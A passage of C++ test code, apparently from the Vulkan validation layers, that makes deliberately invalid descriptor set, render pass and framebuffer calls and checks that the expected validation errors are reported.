(!image_obj.IsCompatible(VK_IMAGE_USAGE_SAMPLED_BIT, format_props.optimalTilingFeatures)) { printf("%s multi-planar format cannot be sampled for optimalTiling. Skipped.\n", kSkipPrefix); } else { VkImageCreateInfo image_ci = {VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO, nullptr, VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT, // need for multi-planar VK_IMAGE_TYPE_2D, mp_format, {64, 64, 1}, 1, 1, VK_SAMPLE_COUNT_1_BIT, VK_IMAGE_TILING_OPTIMAL, VK_IMAGE_USAGE_SAMPLED_BIT, VK_SHARING_MODE_EXCLUSIVE, 0, nullptr, VK_IMAGE_LAYOUT_UNDEFINED}; image_obj.init(&image_ci); ASSERT_TRUE(image_obj.initialized()); VkImageView image_view = image_obj.targetView(mp_format, VK_IMAGE_ASPECT_COLOR_BIT); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorImageInfo-sampler-01564"); descriptor_set.WriteDescriptorImageInfo(0, image_view, sampler, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } } } TEST_F(VkLayerTest, DSTypeMismatch) { // Create DS w/ layout of one type and attempt Update w/ mis-matched type VkResult err; m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding #0 with type VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER but update type is VK_DESCRIPTOR_TYPE_SAMPLER"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, DSUpdateOutOfBounds) { // For overlapping Update, have arrayIndex exceed that of layout m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkBufferTest buffer_test(m_device, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT); if (!buffer_test.GetBufferCurrent()) { // Something prevented creation of buffer so abort printf("%s Buffer creation failed, skipping test\n", kSkipPrefix); return; } // Correctly update descriptor to avoid "NOT_UPDATED" error VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer_test.GetBuffer(); buff_info.offset = 0; buff_info.range = 1024; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstArrayElement = 1; /* This index out of bounds for the update */ descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = &buff_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidDSUpdateIndex) { // Create layout w/ count of 1 and attempt update to that layout w/ binding index 2 VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstBinding-00315"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // This is the wrong type, but out of bounds will be flagged first descriptor_set.WriteDescriptorImageInfo(2, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, DSUpdateEmptyBinding) { // Create layout w/ empty binding and attempt to update it VkResult err; ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 0 /* !! */, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // descriptor_write.descriptorCount = 1, Lie here to avoid parameter_validation error // This is the wrong type, but empty binding error will be flagged first descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstBinding-00316"); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, InvalidDSUpdateStruct) { // Call UpdateDS w/ struct type other than valid VK_STRUCTUR_TYPE_UPDATE_* // types VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, ".sType must be VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); VkDescriptorImageInfo info = {}; info.sampler = sampler; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; /* Intentionally broken struct type */ descriptor_write.dstSet = descriptor_set.set_; descriptor_write.descriptorCount = 1; // This is the wrong type, but out of bounds will be flagged first descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; descriptor_write.pImageInfo = &info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, SampleDescriptorUpdateError) { // Create a single Sampler descriptor and send it an invalid Sampler m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00325"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSampler sampler = CastToHandle<VkSampler, uintptr_t>(0xbaadbeef); // Sampler with invalid handle descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, ImageViewDescriptorUpdateError) { // Create a single combined Image/Sampler descriptor and send it an invalid // imageView VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00326"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); VkImageView view = CastToHandle<VkImageView, uintptr_t>(0xbaadbeef); // invalid imageView object descriptor_set.WriteDescriptorImageInfo(0, view, sampler, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, CopyDescriptorUpdateErrors) { // Create DS w/ layout of 2 types, write update 1 and attempt to copy-update // into the other VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding #1 with type VK_DESCRIPTOR_TYPE_SAMPLER. Types do not match."); ASSERT_NO_FATAL_FAILURE(Init()); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler immutable_sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &immutable_sampler); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); OneOffDescriptorSet descriptor_set_2( m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, static_cast<VkSampler *>(&immutable_sampler)}, }); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // SAMPLER binding from layout above // This write update should succeed descriptor_set.WriteDescriptorImageInfo(1, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); // Now perform a copy update that fails due to type mismatch VkCopyDescriptorSet copy_ds_update; memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; // Copy from SAMPLER binding copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; // ERROR : copy to UNIFORM binding copy_ds_update.descriptorCount = 1; // copy 1 descriptor vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy update that fails due to binding out of bounds m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " does not have copy update src binding of 3."); memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 3; // ERROR : Invalid binding for matching layout copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 1; // Copy 1 descriptor vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy update that fails due to binding out of bounds m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding#1 with offset index of 1 plus update array offset of 0 and update of 5 " "descriptors oversteps total number of descriptors in set: 2."); memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 5; // ERROR copy 5 descriptors (out of bounds for layout) vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy into an immutable sampler m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-dstBinding-02753"); copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; copy_ds_update.dstSet = descriptor_set_2.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 1; vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroySampler(m_device->device(), immutable_sampler, NULL); } TEST_F(VkLayerTest, DrawWithPipelineIncompatibleWithRenderPass) { TEST_DESCRIPTION( "Hit RenderPass incompatible cases. Initial case is drawing with an active renderpass that's not compatible with the bound " "pipeline state object's creation renderpass"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); // We shouldn't need a fragment shader // but add it to be able to run on more devices // Create a renderpass that will be incompatible with default renderpass VkAttachmentReference color_att = {}; color_att.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &color_att; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; // Format incompatible with PSO RP color attach format B8G8R8A8_UNORM attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); VkViewport viewport = {0.0f, 0.0f, 64.0f, 64.0f, 0.0f, 1.0f}; m_viewports.push_back(viewport); pipe.SetViewport(m_viewports); VkRect2D rect = {{0, 0}, {64, 64}}; m_scissors.push_back(rect); pipe.SetScissor(m_scissors); pipe.CreateVKPipeline(pipeline_layout.handle(), rp); VkCommandBufferInheritanceInfo cbii = {}; cbii.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; cbii.renderPass = rp; cbii.subpass = 0; VkCommandBufferBeginInfo cbbi = {}; cbbi.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; cbbi.pInheritanceInfo = &cbii; vk::BeginCommandBuffer(m_commandBuffer->handle(), &cbbi); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdDraw-renderPass-02684"); // Render triangle (the error should trigger on the attempt to draw). m_commandBuffer->Draw(3, 1, 0, 0); // Finalize recording of the command buffer m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, Maint1BindingSliceOf3DImage) { TEST_DESCRIPTION( "Attempt to bind a slice of a 3D texture in a descriptor set. This is explicitly disallowed by KHR_maintenance1 to keep " "things simple for drivers."); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE1_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE1_EXTENSION_NAME); } else { printf("%s %s is not supported; skipping\n", kSkipPrefix, VK_KHR_MAINTENANCE1_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkResult err; OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, }); VkImageCreateInfo ici = {VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO, nullptr, VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR, VK_IMAGE_TYPE_3D, VK_FORMAT_R8G8B8A8_UNORM, {32, 32, 32}, 1, 1, VK_SAMPLE_COUNT_1_BIT, VK_IMAGE_TILING_OPTIMAL, VK_IMAGE_USAGE_SAMPLED_BIT, VK_SHARING_MODE_EXCLUSIVE, 0, nullptr, VK_IMAGE_LAYOUT_UNDEFINED}; VkImageObj image(m_device); image.init(&ici); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo ivci = { VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO, nullptr, 0, image.handle(), VK_IMAGE_VIEW_TYPE_2D, VK_FORMAT_R8G8B8A8_UNORM, {VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY}, {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1}, }; VkImageView view; err = vk::CreateImageView(m_device->device(), &ivci, nullptr, &view); ASSERT_VK_SUCCESS(err); // Meat of the test. m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorImageInfo-imageView-00343"); VkDescriptorImageInfo dii = {VK_NULL_HANDLE, view, VK_IMAGE_LAYOUT_GENERAL}; VkWriteDescriptorSet write = {VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET, nullptr, descriptor_set.set_, 0, 0, 1, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, &dii, nullptr, nullptr}; vk::UpdateDescriptorSets(m_device->device(), 1, &write, 0, nullptr); m_errorMonitor->VerifyFound(); vk::DestroyImageView(m_device->device(), view, nullptr); } TEST_F(VkLayerTest, UpdateDestroyDescriptorSetLayout) { TEST_DESCRIPTION("Attempt updates to descriptor sets with destroyed descriptor set layouts"); // TODO: Update to match the descriptor set layout specific VUIDs/VALIDATION_ERROR_* when present const auto kWriteDestroyedLayout = "VUID-VkWriteDescriptorSet-dstSet-00320"; const auto kCopyDstDestroyedLayout = "VUID-VkCopyDescriptorSet-dstSet-parameter"; const auto kCopySrcDestroyedLayout = "VUID-VkCopyDescriptorSet-srcSet-parameter"; ASSERT_NO_FATAL_FAILURE(Init()); // Set up the descriptor (resource) and write/copy operations to use. float data[16] = {}; VkConstantBufferObj buffer(m_device, sizeof(data), data, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT); ASSERT_TRUE(buffer.initialized()); VkDescriptorBufferInfo info = {}; info.buffer = buffer.handle(); info.range = VK_WHOLE_SIZE; VkWriteDescriptorSet write_descriptor = {}; write_descriptor.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; write_descriptor.dstSet = VK_NULL_HANDLE; // must update this write_descriptor.dstBinding = 0; write_descriptor.descriptorCount = 1; write_descriptor.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; write_descriptor.pBufferInfo = &info; VkCopyDescriptorSet copy_descriptor = {}; copy_descriptor.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_descriptor.srcSet = VK_NULL_HANDLE; // must update copy_descriptor.srcBinding = 0; copy_descriptor.dstSet = VK_NULL_HANDLE; // must update copy_descriptor.dstBinding = 0; copy_descriptor.descriptorCount = 1; // Create valid and invalid source and destination descriptor sets std::vector<VkDescriptorSetLayoutBinding> one_uniform_buffer = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }; OneOffDescriptorSet good_dst(m_device, one_uniform_buffer); ASSERT_TRUE(good_dst.Initialized()); OneOffDescriptorSet bad_dst(m_device, one_uniform_buffer); // Must assert before invalidating it below ASSERT_TRUE(bad_dst.Initialized()); bad_dst.layout_ = VkDescriptorSetLayoutObj(); OneOffDescriptorSet good_src(m_device, one_uniform_buffer); ASSERT_TRUE(good_src.Initialized()); // Put valid data in the good and bad sources, simultaneously doing a positive test on write and copy operations m_errorMonitor->ExpectSuccess(); write_descriptor.dstSet = good_src.set_; vk::UpdateDescriptorSets(m_device->device(), 1, &write_descriptor, 0, NULL); m_errorMonitor->VerifyNotFound(); OneOffDescriptorSet bad_src(m_device, one_uniform_buffer); ASSERT_TRUE(bad_src.Initialized()); // to complete our positive testing use copy, where above we used write. copy_descriptor.srcSet = good_src.set_; copy_descriptor.dstSet = bad_src.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); bad_src.layout_ = VkDescriptorSetLayoutObj(); m_errorMonitor->VerifyNotFound(); // Trigger the three invalid use errors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kWriteDestroyedLayout); write_descriptor.dstSet = bad_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 1, &write_descriptor, 0, NULL); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kCopyDstDestroyedLayout); copy_descriptor.dstSet = bad_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kCopySrcDestroyedLayout); copy_descriptor.srcSet = bad_src.set_; copy_descriptor.dstSet = good_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, FramebufferIncompatible) { TEST_DESCRIPTION( "Bind a secondary command buffer with a framebuffer that does not match the framebuffer for the active renderpass."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // A renderpass with one color attachment. VkAttachmentDescription attachment = {0, VK_FORMAT_B8G8R8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_STORE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkAttachmentReference att_ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &att_ref, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &attachment, 1, &subpass, 0, nullptr}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); // A compatible framebuffer. VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo ivci = { VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO, nullptr, 0, image.handle(), VK_IMAGE_VIEW_TYPE_2D, VK_FORMAT_B8G8R8A8_UNORM, {VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY}, {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1}, }; VkImageView view; err = vk::CreateImageView(m_device->device(), &ivci, nullptr, &view); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &view, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkCommandBufferAllocateInfo cbai = {}; cbai.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_ALLOCATE_INFO; cbai.commandPool = m_commandPool->handle(); cbai.level = VK_COMMAND_BUFFER_LEVEL_SECONDARY; cbai.commandBufferCount = 1; VkCommandBuffer sec_cb; err = vk::AllocateCommandBuffers(m_device->device(), &cbai, &sec_cb); ASSERT_VK_SUCCESS(err); VkCommandBufferBeginInfo cbbi = {}; VkCommandBufferInheritanceInfo cbii = {}; cbii.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; cbii.renderPass = renderPass(); cbii.framebuffer = fb; cbbi.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; cbbi.pNext = NULL; cbbi.flags = VK_COMMAND_BUFFER_USAGE_ONE_TIME_SUBMIT_BIT | VK_COMMAND_BUFFER_USAGE_RENDER_PASS_CONTINUE_BIT; cbbi.pInheritanceInfo = &cbii; vk::BeginCommandBuffer(sec_cb, &cbbi); vk::EndCommandBuffer(sec_cb); VkCommandBufferBeginInfo cbbi2 = {VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO, nullptr, 0, nullptr}; vk::BeginCommandBuffer(m_commandBuffer->handle(), &cbbi2); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, VK_SUBPASS_CONTENTS_SECONDARY_COMMAND_BUFFERS); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdExecuteCommands-pCommandBuffers-00099"); vk::CmdExecuteCommands(m_commandBuffer->handle(), 1, &sec_cb); m_errorMonitor->VerifyFound(); // Cleanup vk::CmdEndRenderPass(m_commandBuffer->handle()); vk::EndCommandBuffer(m_commandBuffer->handle()); vk::DestroyImageView(m_device->device(), view, NULL); vk::DestroyRenderPass(m_device->device(), rp, NULL); vk::DestroyFramebuffer(m_device->device(), fb, NULL); } TEST_F(VkLayerTest, RenderPassMissingAttachment) { TEST_DESCRIPTION("Begin render pass with missing framebuffer attachment"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create a renderPass with a single color attachment VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); auto createView = lvl_init_struct<VkImageViewCreateInfo>(); createView.image = m_renderTargets[0]->handle(); createView.viewType = VK_IMAGE_VIEW_TYPE_2D; createView.format = VK_FORMAT_B8G8R8A8_UNORM; createView.components.r = VK_COMPONENT_SWIZZLE_R; createView.components.g = VK_COMPONENT_SWIZZLE_G; createView.components.b = VK_COMPONENT_SWIZZLE_B; createView.components.a = VK_COMPONENT_SWIZZLE_A; createView.subresourceRange = {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1}; createView.flags = 0; VkImageView iv; vk::CreateImageView(m_device->handle(), &createView, nullptr, &iv); auto fb_info = lvl_init_struct<VkFramebufferCreateInfo>(); fb_info.renderPass = rp; fb_info.attachmentCount = 1; fb_info.pAttachments = &iv; fb_info.width = 100; fb_info.height = 100; fb_info.layers = 1; // Create the framebuffer then destory the view it uses. VkFramebuffer fb; err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); vk::DestroyImageView(device(), iv, NULL); ASSERT_VK_SUCCESS(err); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkRenderPassBeginInfo-framebuffer-parameter"); auto rpbi = lvl_init_struct<VkRenderPassBeginInfo>(); rpbi.renderPass = rp; rpbi.framebuffer = fb; rpbi.renderArea = {{0, 0}, {32, 32}}; 